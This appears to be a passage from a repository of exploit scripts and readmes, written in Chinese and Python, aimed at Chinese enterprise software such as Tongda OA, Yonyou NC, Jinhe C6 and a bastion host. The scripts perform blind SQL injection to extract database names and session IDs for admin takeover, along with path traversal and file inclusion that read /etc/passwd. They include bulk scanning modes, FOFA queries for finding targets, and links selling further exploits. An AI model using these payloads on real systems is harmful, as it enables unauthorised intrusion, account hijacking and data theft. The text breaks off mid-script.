l=['0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','_','-','(',')'] 6 | def Hex_encoding(string): 7 | Hex=binascii.b2a_hex(string.encode()) 8 | return "0x"+Hex.decode() 9 | def exp(baseurl): 10 | if baseurl[-1]=='/': 11 | baseurl=baseurl 12 | else: 13 | baseurl=baseurl+"/" 14 | url=baseurl+'general/file_folder/swfupload_new.php' 15 | headers = { 16 | 'Content-Type': 'multipart/form-data; boundary=----------GFioQpMK0vv2', 17 | 'Accept-Encoding': 'gzip' 18 | } 19 | result='' 20 | for i in range(1,10): 21 | for j in l: 22 | ej=Hex_encoding(j) 23 | data=f'''------------GFioQpMK0vv2\r 24 | Content-Disposition: form-data; name="ATTACHMENT_ID"\r 25 | \r 26 | 1\r 27 | ------------GFioQpMK0vv2\r 28 | Content-Disposition: form-data; name="ATTACHMENT_NAME"\r 29 | \r 30 | 1\r 31 | ------------GFioQpMK0vv2\r 32 | Content-Disposition: form-data; name="FILE_SORT"\r 33 | \r 34 | 2\r 35 | ------------GFioQpMK0vv2\r 36 | Content-Disposition: form-data; name="SORT_ID"\r 37 | \r 38 | 0 RLIKE (SELECT (CASE WHEN (substr(database(),{i},1)={ej}) THEN 1 ELSE 0x28 END))\r 39 | ------------GFioQpMK0vv2--''' 40 | # print(data) 41 | response=requests.post(url=url, headers=headers,data=data,verify=False,timeout=5) 42 | if '"status":1' in response.text: 43 | result+=j 44 | print(result) 45 | break 46 | # def session(baseurl): 47 | # if baseurl[-1]=='/': 48 | # baseurl=baseurl 49 | # else: 50 | # baseurl=baseurl+"/" 51 | # url=baseurl+'general/file_folder/swfupload_new.php' 52 | # headers = { 53 | # 'Content-Type': 'multipart/form-data; boundary=----------GFioQpMK0vv2', 54 | # 'Accept-Encoding': 'gzip' 55 | # } 56 | # result='' 57 | # for i in range(1,10): 58 | # for j in l: 59 | # ej=Hex_encoding(j) 60 | # data=f'''------------GFioQpMK0vv2\r 61 | # Content-Disposition: form-data; name="ATTACHMENT_ID"\r 62 | # \r 63 | # 1\r 64 | # ------------GFioQpMK0vv2\r 65 | # Content-Disposition: form-data; name="ATTACHMENT_NAME"\r 66 | # \r 67 | # 1\r 68 | # ------------GFioQpMK0vv2\r 69 | # Content-Disposition: form-data; name="FILE_SORT"\r 70 | # \r 71 | # 2\r 72 | # ------------GFioQpMK0vv2\r 73 | # Content-Disposition: form-data; name="SORT_ID"\r 74 | # \r 75 | # 0 RLIKE (SELECT (CASE WHEN (substr((select SID from user_online limit 0,1),{i},1)={ej}) THEN 1 ELSE 0x28 END))\r 76 | # ------------GFioQpMK0vv2--''' 77 | # print(i) 78 | # response=requests.post(url=url, headers=headers,data=data,verify=False,timeout=5) 79 | # if '"status":1' in response.text: 80 | # result+=j 81 | # print(result) 82 | # break 83 | if __name__ == '__main__': 84 | url=sys.argv[1] 85 | exp(url) -------------------------------------------------------------------------------- /20231224通达三个漏洞/exp3.py: -------------------------------------------------------------------------------- 1 | import requests,re,urllib3,sys 2 | from hashlib import md5 3 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 4 | def dbname(baseurl): 5 | if baseurl[-1]=='/': 6 | baseurl=baseurl 7 | else: 8 | baseurl=baseurl+"/" 9 | url=baseurl+'general/document/index.php/recv/register/insert' 10 | headers = { 11 | 'Content-Type': 'application/x-www-form-urlencoded' 12 | } 13 | start=0 14 | end=126 15 | dbname='' 16 | flag=[] 17 | for i in range(1,27): 18 | start=0 19 | end=126 20 | if len(flag)>0: 21 | break 22 | while True: 23 | print(i,start,end) 24 | mid=int((start+end)/2) 25 | if start+1==end: 26 | if start!=0 and end !=1: 27 | dbname+=chr(end) 28 | print(dbname) 29 | break 30 | else: 31 | flag.append(1) 32 | break 33 | data=f'title)values("\'"^exp(if(ascii(substr((select/**/database()),{i},1))>{mid},1,710)))# =1&_SERVER=' 34 | response=requests.post(url=url, headers=headers,data=data,verify=False,timeout=5,allow_redirects=False) 35 | if response.status_code==302: 36 | start=mid 37 | else: 38 | end=mid 39 | 40 | print(f"当前数据库名:{dbname}") 41 | def session(baseurl): 42 | if baseurl[-1]=='/': 43 | baseurl=baseurl 44 | else: 45 | baseurl=baseurl+"/" 46 | url=baseurl+'general/document/index.php/recv/register/insert' 47 | headers = { 48 | 'Content-Type': 'application/x-www-form-urlencoded' 49 | } 50 | start=0 51 | end=126 52 | PHPSESSID='' 53 | flag=[] 54 | for i in range(25,27): 55 | start=0 56 | end=126 57 | if len(flag)>0: 58 | break 59 | while True: 60 | print(i,start,end) 61 | mid=int((start+end)/2) 62 | if start+1==end: 63 | if start!=0 and end !=1: 64 | PHPSESSID+=chr(end) 65 | print(PHPSESSID) 66 | break 67 | else: 68 | flag.append(1) 69 | break 70 | data=f'title)values("\'"^exp(if(ascii(substr((select/**/SID/**/from/**/user_online/**/where/**/uid/**/like/**/1/**/limit/**/0,1),{i},1))>{mid},1,710)))# =1&_SERVER=' 71 | # data=f'title)values("\'"^exp(if(ascii(substr((select/**/SID/**/from/**/user_online/**/where/**/uid<2/**/limit/**/0,1),{i},1))>{mid},1,710)))# =1&_SERVER=' 72 | # data=f'title)values("\'"^exp(if(ascii(substr((select/**/SID/**/from/**/user_online/**/limit/**/0,1),{i},1))>{mid},1,710)))# =1&_SERVER=' 73 | response=requests.post(url=url, headers=headers,data=data,verify=False,timeout=5,allow_redirects=False) 74 | if response.status_code==302: 75 | start=mid 76 | else: 77 | end=mid 78 | 79 | print(f"使用PHPSESSID={PHPSESSID}访问{baseurl}general/index.php登入后台") 80 | # break 81 | if __name__ == '__main__': 82 | url=sys.argv[1] 83 | # session(url) 84 | dbname(url) 85 | 86 | -------------------------------------------------------------------------------- /20231224通达三个漏洞/poc.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import time 3 | import requests 4 | import urllib3 5 | from hashlib import md5 6 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 7 | from urllib import parse 8 | from rich.console import Console 9 | import argparse 10 | import re 11 | import base64 12 | import multiprocessing 13 | from multiprocessing.dummy import Pool 14 | import concurrent.futures 15 | import json 16 | import warnings 17 | import random 18 | warnings.filterwarnings("ignore") 19 | 20 | 21 | def banner(): 22 | test = """ 23 | 24 | 8b d8 88 88 a8P 88 888b 88 ,ad8888ba, 25 | Y8, ,8P ,d88 88 ,88' ,d88 8888b 88 d8"' `"8b 26 | Y8, ,8P 888888 88 ,88" 888888 88 `8b 88 d8' 27 | "8aa8" 88 88,d88' 88 88 `8b 88 88 28 | `88' 88 8888"88, 88 88 `8b 88 88 88888 29 | 88 88 88P Y8b 88 88 `8b 88 Y8, 88 30 | 88 88 88 "88, 88 88 `8888 Y8a. .a88 31 | 88 88 88 Y8b 88 88 `888 `"Y88888P" 32 | 33 | 888888888888 34 | 35 | tag: this is a 通达-FLOW_ID SQL注入漏洞 poc 36 | @version: 1.0.0 @author: Y1_K1NG 37 | """ 38 | print(test) 39 | def randomInt(s,e): 40 | key=random.randint(int(s),int(e)) 41 | return key 42 | 43 | def poc(target): 44 | randstr = randomInt(1000000, 9999999) 45 | url = target + f"/general/score/flow/scoredate/result.php?FLOW_ID=11%bf%27%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),md5({randstr}),1,1)a%20from%20information_schema.tables%20group%20by%20a)b)%23" 46 | 47 | try: 48 | response = requests.get(url, timeout=8, verify=False) 49 | if md5(str(randstr).encode()).hexdigest() in response.text: 50 | print(f"[+]{target} is valuable") 51 | with open("result.txt", "a+", encoding="utf-8") as f: 52 | f.write(target + "\n") 53 | else: 54 | print(f"[-]{target} is not valuable") 55 | except Exception as e: 56 | print(f"[*] {target} error: {str(e)}") 57 | 58 | 59 | def extract_host(url): 60 | """ 61 | 从 URL 中提取主机地址和端口号,返回 (host, port) 62 | """ 63 | match = re.search(r"(?:https?://)?([\w\.]+):?(\d+)?", url) 64 | if match: 65 | host, port = match.groups() 66 | if not port: 67 | if "https" in url: 68 | port = "443" 69 | else: 70 | port = "80" 71 | return host, int(port) 72 | else: 73 | return None, None 74 | 75 | def main(): 76 | banner() 77 | parser = argparse.ArgumentParser(description='canal admin weak Password') 78 | parser.add_argument("-u", "--url", dest="url", type=str, help=" example: http://www.example.com") 79 | parser.add_argument("-f", "--file", dest="file", type=str, help=" urls.txt") 80 | args = parser.parse_args() 81 | if args.url and not args.file: 82 | host, port = extract_host(args.url) 83 | if host: 84 | if "https" in args.url: 85 | url = f"https://{host}:{port}" 86 | else: 87 | url = f"http://{host}:{port}" 88 | poc(url) 89 | else: 90 | print(f"Invalid URL: {args.url}") 91 | elif not args.url and args.file: 92 | url_list = [] 93 | with open(args.file, "r", encoding="utf-8") as f: 94 | for url in f.readlines(): 95 | url = url.strip().replace("\n", "") 96 | host, port = extract_host(url) 97 | if host: 98 | if "https" in url: 99 | url_list.append(f"https://{host}:{port}") 100 | else: 101 | url_list.append(f"http://{host}:{port}") 102 | else: 103 | print(f"Invalid URL: {url}") 104 | 105 | mp = Pool(10) # 创建一个拥有20个线程的线程池 106 | mp.map(poc, url_list) 107 | mp.close() 108 | mp.join() 109 | else: 110 | print(f"Usage:\n\t python3 {sys.argv[0]} -h") 111 | 112 | 113 | if __name__ == '__main__': 114 | main() 115 | -------------------------------------------------------------------------------- /20231224通达三个漏洞/readme.md: -------------------------------------------------------------------------------- 1 | # FLOW_ID SQL注入,swfupload_new.php文件上传,title参数 SQL注入 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | fofa语法 6 | 7 | fofa:title="EasyCVR" 8 | 9 | app="TDXK-通达OA" 10 | 11 | 批量poc(记得安装库) 12 | 13 | python poc.py -u 14 | 15 | 16 | 17 | python poc.py -f .txt 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | exp已经发布在圈子 26 | 27 | https://pc.fenchuan8.com/#/index?forum=36894&yqm=M1R3 28 | 29 | 私聊圈主39r直接进圈 30 | 31 | ![image-20231224114053918](assets/image-20231224114053918.png) 32 | 33 | python exp.py http:// 34 | 35 | ![image-20231224113959549](assets/image-20231224113959549.png) 36 | 37 | -------------------------------------------------------------------------------- /20231225用友NC_mxservlet反序列化漏洞/assets/image-20231225211647123.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20231225用友NC_mxservlet反序列化漏洞/assets/image-20231225211647123.png -------------------------------------------------------------------------------- /20231225用友NC_mxservlet反序列化漏洞/assets/image-20231225211841367.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20231225用友NC_mxservlet反序列化漏洞/assets/image-20231225211841367.png -------------------------------------------------------------------------------- /20231225用友NC_mxservlet反序列化漏洞/readme.md: -------------------------------------------------------------------------------- 1 | # 用友 NC mxservlet 反序列化漏洞 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | fofa语法 6 | 7 | fofa:app="用友-UFIDA-NC" 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 批量poc(记得安装库) 16 | 17 | python poc.py -u 18 | 19 | 20 | 21 | python poc.py -f .txt 22 | 23 | ![image-20231225211647123](assets/image-20231225211647123.png) 24 | 25 | exp可进圈获取 26 | 27 | 现在有优惠哦 28 | 29 | https://pc.fenchuan8.com/#/index?forum=62709&yqm=M1R3 30 | 31 | 32 | 33 | ![image-20231225211841367](assets/image-20231225211841367.png) 34 | 35 | -------------------------------------------------------------------------------- /20231226某运维堡垒机存在任意文件读取漏洞/poc.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import time 3 | import requests 4 | import urllib3 5 | from hashlib import md5 6 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 7 | from urllib import parse 8 | from rich.console import Console 9 | import argparse 10 | import re 11 | import base64 12 | import multiprocessing 13 | from multiprocessing.dummy import Pool 14 | import concurrent.futures 15 | import json 16 | import warnings 17 | import random 18 | warnings.filterwarnings("ignore") 19 | 20 | 21 | def banner(): 22 | test = """ 23 | 24 | 8b d8 88 88 a8P 88 888b 88 ,ad8888ba, 25 | Y8, ,8P ,d88 88 ,88' ,d88 8888b 88 d8"' `"8b 26 | Y8, ,8P 888888 88 ,88" 888888 88 `8b 88 d8' 27 | "8aa8" 88 88,d88' 88 88 `8b 88 88 28 | `88' 88 8888"88, 88 88 `8b 88 88 88888 29 | 88 88 88P Y8b 88 88 `8b 88 Y8, 88 30 | 88 88 88 "88, 88 88 `8888 Y8a. .a88 31 | 88 88 88 Y8b 88 88 `888 `"Y88888P" 32 | 33 | 888888888888 34 | 35 | tag: this is a 某运维堡垒机存在任意文件读取漏洞 poc 36 | @version: 1.0.0 @author: Y1_K1NG 37 | """ 38 | print(test) 39 | def poc(target): 40 | if target[-1] == '/': 41 | target = target 42 | else: 43 | target = target + "/" 44 | url = target + 'bhost/GetCaCert?a1=../../../../../etc/hosts' 45 | headers = { 46 | 'User-Agent': 'Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 47 | } 48 | 49 | try: 50 | response = requests.get(url,headers=headers,verify=False,timeout=15) 51 | if 'y1k1ng' in response.text and 'echo' not in response.text: 52 | print(f"[+]{target} is valuable") 53 | with open("result.txt", "a+", encoding="utf-8") as f: 54 | f.write(target + "\n") 55 | else: 56 | print(f"[-]{target} is not valuable") 57 | except Exception as e: 58 | print(f"[*] {target} error: {str(e)}") 59 | 60 | 61 | def extract_host(url): 62 | """ 63 | 从 URL 中提取主机地址和端口号,返回 (host, port) 64 | """ 65 | match = re.search(r"(?:https?://)?([\w\.]+):?(\d+)?", url) 66 | if match: 67 | host, port = match.groups() 68 | if not port: 69 | if "https" in url: 70 | port = "443" 71 | else: 72 | port = "80" 73 | return host, int(port) 74 | else: 75 | return None, None 76 | 77 | def main(): 78 | banner() 79 | parser = argparse.ArgumentParser(description='canal admin weak Password') 80 | parser.add_argument("-u", "--url", dest="url", type=str, help=" example: http://www.example.com") 81 | parser.add_argument("-f", "--file", dest="file", type=str, help=" urls.txt") 82 | args = parser.parse_args() 83 | if args.url and not args.file: 84 | host, port = extract_host(args.url) 85 | if host: 86 | if "https" in args.url: 87 | url = f"https://{host}:{port}" 88 | else: 89 | url = f"http://{host}:{port}" 90 | poc(url) 91 | else: 92 | print(f"Invalid URL: {args.url}") 93 | elif not args.url and args.file: 94 | url_list = [] 95 | with open(args.file, "r", encoding="utf-8") as f: 96 | for url in f.readlines(): 97 | url = url.strip().replace("\n", "") 98 | host, port = extract_host(url) 99 | if host: 100 | if "https" in url: 101 | url_list.append(f"https://{host}:{port}") 102 | else: 103 | url_list.append(f"http://{host}:{port}") 104 | else: 105 | print(f"Invalid URL: {url}") 106 | 107 | mp = Pool(10) # 创建一个拥有20个线程的线程池 108 | mp.map(poc, url_list) 109 | mp.close() 110 | mp.join() 111 | else: 112 | print(f"Usage:\n\t python3 {sys.argv[0]} -h") 113 | 114 | 115 | if __name__ == '__main__': 116 | main() 117 | -------------------------------------------------------------------------------- /20231226某运维堡垒机存在任意文件读取漏洞/readme.md: -------------------------------------------------------------------------------- 1 | 某运维堡垒机存在任意文件读取漏洞 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | fofa:banner="Set-Cookie: bhost=" || header="Set-Cookie: bhost=" 6 | 7 | 8 | 9 | GET /bhost/GetCaCert?a1=../../../../../etc/hosts HTTP/1.1 10 | Host: 127.0.0.1 11 | 12 | 13 | 14 | 直接GET请求即可 15 | 16 | 17 | 批量poc(记得安装库) 18 | 19 | python poc.py -u 20 | 21 | 22 | python poc.py -f .txt 23 | 24 | -------------------------------------------------------------------------------- /20231227wordpress_admin-ajax.php文件包含漏洞/readme.md: -------------------------------------------------------------------------------- 1 | # wordpress admin-ajax.php文件包含漏洞 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | fofa语法 6 | 7 | body="wp-content/themes/motor"" 8 | 9 | POC: 10 | 11 | ``` 12 | POST /wp-admin/admin-ajax.php HTTP/1.1 13 | Host: 14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 15 | Content-Type: multipart/form-data;boundary=--------1699260943 16 | Content-Length: 250 17 | 18 | ----------1699260943Content-Disposition: form-data; name="action"motor_load_more----------1699260943 19 | Content-Disposition: form-data;name="file" 20 | 21 | php://filter/resource=/etc/passwd#这里整不整编码看你,text找匹配内容 22 | ----------1699260943-- 23 | ``` 24 | 25 | 26 | 27 | 28 | 29 | 批量poc(记得安装库) 30 | 31 | python poc.py -u 32 | 33 | 34 | 35 | python poc.py -f .txt 36 | 37 | -------------------------------------------------------------------------------- /20231228某电子水库安全监管平台sql注入/poc.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import argparse 3 | import base64 4 | import re 5 | import sys 6 | from multiprocessing.dummy import Pool 7 | 8 | import requests 9 | import urllib3 10 | from rich.console import Console 11 | 12 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 13 | 14 | 15 | def banner(): 16 | test = """ 17 | 8b d8 88 88 a8P 88 888b 88 ,ad8888ba, 18 | Y8, ,8P ,d88 88 ,88' ,d88 8888b 88 d8"' `"8b 19 | Y8, ,8P 888888 88 ,88" 888888 88 `8b 88 d8' 20 | "8aa8" 88 88,d88' 88 88 `8b 88 88 21 | `88' 88 8888"88, 88 88 `8b 88 88 88888 22 | 88 88 88P Y8b 88 88 `8b 88 Y8, 88 23 | 88 88 88 "88, 88 88 `888 `"Y88888P" 24 | 25 | 888888888888 26 | 27 | tag: this is a 某电子水库安全监管平台sql注入漏洞 poc 28 | @version: 1.0.3 @author: Y1_K1NG 29 | """ 30 | print(test) 31 | 32 | 33 | def poc(target): 34 | if target[-1] == '/': 35 | target = target 36 | else: 37 | target = target + "/" 38 | url = target + 'WebServices/SIMMaintainService.asmx/GetAllRechargeRecordsBySIMCardId' 39 | 40 | 41 | headers = { 42 | "Content-Type": "application/x-www-form-urlencoded", 43 | "User-Agent": "Mozilla/5.0", 44 | "Accept-Language": "zh-CN,zh;q=0.9", 45 | "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", 46 | "Accept-Encoding": "gzip, deflate", 47 | "Cookie": "currentuser=username=admin; usercookiename=usernames=admin;", 48 | "Content-Length": "128" 49 | 50 | } 51 | data = '''loginIdentifer=123&simcardId=123';WAITFOR DELAY '0:0:3'--''' 52 | 53 | try: 54 | response = requests.post(url, headers=headers, verify=False, timeout=15, data=data) 55 | # print(response.request.body) 56 | # print(response.content) 57 | if response.status_code == 200 and response.elapsed.total_seconds() > 2: 58 | print(f"[+] {target} 存在 sql ") 59 | else: 60 | print(f"[-] {target} 未发现 sql") 61 | except Exception as e: 62 | print(f"[*] {target} error: {str(e)}") 63 | 64 | 65 | def extract_host(url): 66 | """ 67 | 从 URL 中提取主机地址和端口号,返回 (host, port) 68 | """ 69 | match = re.search(r"(http://|https://)?([\w\.]+):?(\d+)?", url) 70 | if match: 71 | prefix, host, port = match.groups() 72 | if not port: 73 | if prefix and "https" in prefix: 74 | port = "443" 75 | else: 76 | port = "80" 77 | return host, int(port) 78 | else: 79 | return None, None 80 | 81 | 82 | def main(): 83 | banner() 84 | parser = argparse.ArgumentParser(description='canal admin weak Password') 85 | parser.add_argument("-u", "--url", dest="url", type=str, help=" example: http://www.example.com") 86 | parser.add_argument("-f", "--file", dest="file", type=str, help=" urls.txt") 87 | args = parser.parse_args() 88 | 89 | if args.url and not args.file: 90 | if "https://" in args.url or "http://" in args.url: 91 | url = args.url 92 | else: 93 | host, port = extract_host(args.url) 94 | url = f"http://{host}:{port}" 95 | poc(url) 96 | 97 | elif args.url is None and args.file is not None: 98 | url_list = [] 99 | with open(args.file, "r", encoding="utf-8") as f: 100 | for url in f.readlines(): 101 | url = url.strip().replace("\n", "") 102 | if "https://" in url or "http://" in url: 103 | url = url 104 | else: 105 | host, port = extract_host(url) 106 | url = f"http://{host}:{port}" 107 | url_list.append(url) 108 | 109 | pool = Pool(10) 110 | pool.map(poc, url_list) 111 | pool.close() 112 | pool.join() 113 | 114 | else: 115 | parser.print_help() 116 | 117 | 118 | if __name__ == '__main__': 119 | main() 120 | -------------------------------------------------------------------------------- /20231228某电子水库安全监管平台sql注入/readme.md: -------------------------------------------------------------------------------- 1 | # 某电子水库安全监管平台-存在sql注入漏洞 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | fofa语法 6 | 7 | js_name="js/PSExtend.js" 8 | 9 | POC: 10 | 11 | POST /WebServices/SIMMaintainService.asmx/GetAllRechargeRecordsBySIMCardId HTTP/1.1 12 | Host: 13 | "Accept-Language": "zh-CN,zh;q=0.9" 14 | Content-Type: application/x-www-form-urlencoded 15 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36 16 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 17 | Accept-Encoding: gzip, deflate 18 | Cookie: currentuser=username=admin; usercookiename=usernames=admin; 19 | Content-Length: 128 20 | 21 | loginIdentifer=123&simcardId=123';WAITFOR DELAY '0:0:3'-- 22 | 23 | 24 | 25 | 直接GET请求即可 26 | 27 | ![image-20231219105512392](assets/image-20231219105512392.png) 28 | 29 | 批量poc(记得安装库) 30 | 31 | python poc.py -u 32 | 33 | ![image-20231219105617309](assets/image-20231219105617309.png) 34 | 35 | python poc.py -f .txt 36 | 37 | ![image-20231219105706862](assets/image-20231219105706862.png) -------------------------------------------------------------------------------- /20231229用友NC Cloud soapFormat接口XXE漏洞/poc.md: -------------------------------------------------------------------------------- 1 | # 用友NC Cloud soapFormat接口XXE漏洞 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | fofa语法 6 | 7 | FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/" 8 | 9 | 记得装库 10 | 11 | python poc.py -u 12 | 13 | ![image-20231219105617309](assets/image-20231219105617309.png) 14 | 15 | python poc.py -f .txt 16 | 17 | ![image-20231219105706862](assets/image-20231219105706862.png) -------------------------------------------------------------------------------- /20231230金和-c6 gethomeinfo sql注入/poc.md: -------------------------------------------------------------------------------- 1 | # 金和-c6 gethomeinfo sql注入 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | 金和-c6 gethomeinfo sql注入 6 | 7 | 指纹 body="JHSoft.Web.AddMenu" 8 | 9 | GET /c6/jhsoft.mobileapp/AndroidSevices/HomeService.asmx/GetHomeInfo?userID=1'%3b+WAITFOR%20DELAY%20%270:0:3%27-- 10 | 11 | 12 | 13 | 直接GET请求即可 14 | 15 | 16 | 17 | 批量poc(记得安装库) 18 | 19 | python poc.py -u 20 | 21 | 22 | 23 | python poc.py -f .txt 24 | 25 | -------------------------------------------------------------------------------- /20231230金和-c6 gethomeinfo sql注入/poc.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import argparse 3 | import base64 4 | import re 5 | import sys 6 | from multiprocessing.dummy import Pool 7 | 8 | import requests 9 | import urllib3 10 | from rich.console import Console 11 | 12 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 13 | 14 | 15 | def banner(): 16 | test = """ 17 | 8b d8 88 88 a8P 88 888b 88 ,ad8888ba, 18 | Y8, ,8P ,d88 88 ,88' ,d88 8888b 88 d8"' `"8b 19 | Y8, ,8P 888888 88 ,88" 888888 88 `8b 88 d8' 20 | "8aa8" 88 88,d88' 88 88 `8b 88 88 21 | `88' 88 8888"88, 88 88 `8b 88 88 88888 22 | 88 88 88P Y8b 88 88 `8b 88 Y8, 88 23 | 88 88 88 "88, 88 88 `888 `"Y88888P" 24 | 25 | 888888888888 26 | 27 | tag: this is a jinher-c6-HomeService-sqli poc 28 | @version: 1.0.3 @author: Y1_K1NG 29 | """ 30 | print(test) 31 | 32 | 33 | def poc(target): 34 | if target[-1] == '/': 35 | target = target 36 | else: 37 | target = target + "/" 38 | url = target + '''c6/jhsoft.mobileapp/AndroidSevices/HomeService.asmx/GetHomeInfo?userID=1'%3b+WAITFOR%20DELAY%20%270:0:3%27--''' 39 | 40 | 41 | headers = { 42 | "Connection": "close", 43 | "User-Agent": "Mozilla/5.0" 44 | 45 | } 46 | 47 | try: 48 | response = requests.get(url, headers=headers, verify=False, timeout=15) 49 | # print(response.request.body) 50 | # print(response.content) 51 | if response.elapsed.total_seconds() > 2: 52 | print(f"[+] {target} 存在 sql ") 53 | else: 54 | print(f"[-] {target} 未发现 sql") 55 | except Exception as e: 56 | print(f"[*] {target} error: {str(e)}") 57 | 58 | 59 | def extract_host(url): 60 | """ 61 | 从 URL 中提取主机地址和端口号,返回 (host, port) 62 | """ 63 | match = re.search(r"(http://|https://)?([\w\.]+):?(\d+)?", url) 64 | if match: 65 | prefix, host, port = match.groups() 66 | if not port: 67 | if prefix and "https" in prefix: 68 | port = "443" 69 | else: 70 | port = "80" 71 | return host, int(port) 72 | else: 73 | return None, None 74 | 75 | 76 | def main(): 77 | banner() 78 | parser = argparse.ArgumentParser(description='canal admin weak Password') 79 | parser.add_argument("-u", "--url", dest="url", type=str, help=" example: http://www.example.com") 80 | parser.add_argument("-f", "--file", dest="file", type=str, help=" urls.txt") 81 | args = parser.parse_args() 82 | 83 | if args.url and not args.file: 84 | if "https://" in args.url or "http://" in args.url: 85 | url = args.url 86 | else: 87 | host, port = extract_host(args.url) 88 | url = f"http://{host}:{port}" 89 | poc(url) 90 | 91 | elif args.url is None and args.file is not None: 92 | url_list = [] 93 | with open(args.file, "r", encoding="utf-8") as f: 94 | for url in f.readlines(): 95 | url = url.strip().replace("\n", "") 96 | if "https://" in url or "http://" in url: 97 | url = url 98 | else: 99 | host, port = extract_host(url) 100 | url = f"http://{host}:{port}" 101 | url_list.append(url) 102 | 103 | pool = Pool(10) 104 | pool.map(poc, url_list) 105 | pool.close() 106 | pool.join() 107 | 108 | else: 109 | parser.print_help() 110 | 111 | 112 | if __name__ == '__main__': 113 | main() 114 | -------------------------------------------------------------------------------- /20240102某神SecGate3600 authManageSet.cgi信息泄露漏洞/poc.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import argparse 3 | import base64 4 | import re 5 | import sys 6 | from multiprocessing.dummy import Pool 7 | 8 | import requests 9 | import urllib3 10 | from rich.console import Console 11 | 12 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 13 | 14 | 15 | def banner(): 16 | test = """ 17 | 8b d8 88 88 a8P 88 888b 88 ,ad8888ba, 18 | Y8, ,8P ,d88 88 ,88' ,d88 8888b 88 d8"' `"8b 19 | Y8, ,8P 888888 88 ,88" 888888 88 `8b 88 d8' 20 | "8aa8" 88 88,d88' 88 88 `8b 88 88 21 | `88' 88 8888"88, 88 88 `8b 88 88 88888 22 | 88 88 88P Y8b 88 88 `8b 88 Y8, 88 23 | 88 88 88 "88, 88 88 `888 `"Y88888P" 24 | 25 | 888888888888 26 | 27 | tag: this is a 某神SecGate3600 authManageSet.cgi信息泄露漏洞 poc 28 | @version: 1.0.3 @author: Y1_K1NG 29 | """ 30 | print(test) 31 | 32 | 33 | def poc(target): 34 | if target[-1] == '/': 35 | target = target 36 | else: 37 | target = target + "/" 38 | url = target + "cgi-bin/authUser/authManageSet.cgi" 39 | 40 | 41 | headers = { 42 | "Connection": "close", 43 | "User-Agent": "Mozilla/5.0", 44 | "Accept": "*/*", 45 | "Accept-Encoding": "gzip, deflate", 46 | "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8", 47 | "Content-Type": "application/x-www-form-urlencoded" 48 | 49 | } 50 | data=''' 51 | type=getAllUsers&_search=false&nd=1645000391264&rows=-1&page=1&sidx=&sord=asc 52 | ''' 53 | 54 | try: 55 | response = requests.post(url, headers=headers, data=data, verify=False, timeout=15) 56 | # print(response.request.body) 57 | # print(response.content) 58 | randstr = r"id" 59 | if randstr in response.text and response.status_code == 200: 60 | print(f"[+] {target} 存在 